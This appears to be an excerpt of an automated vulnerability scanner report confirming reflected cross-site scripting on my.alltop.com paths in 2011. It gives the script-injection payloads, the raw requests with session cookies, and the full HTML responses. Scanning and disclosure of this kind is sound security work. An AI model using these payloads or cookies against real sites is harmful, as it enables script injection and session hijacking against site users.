Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:12 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:12 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
..
- /alpha/z

/alpha/z CONFIRMED

http://my.alltop.com/alpha/z?'"--></style></script><script>alert(0x000236)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000236)</script>

Request

GET /alpha/z?'"--></style></script><script>netsparker(0x000236)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:20 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45; expires=Mon, 06-Jun-2011 20:50:21 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:21 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 7020
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplet..
- /img/

/img/ CONFIRMED

http://my.alltop.com/img/?'"--></style></script><script>alert(0x00023C)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00023C)</script>

Request

GET /img/?'"--></style></script><script>netsparker(0x00023C)</script> HTTP/1.1
Referer: http://my.alltop.com/img/search-bttn.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
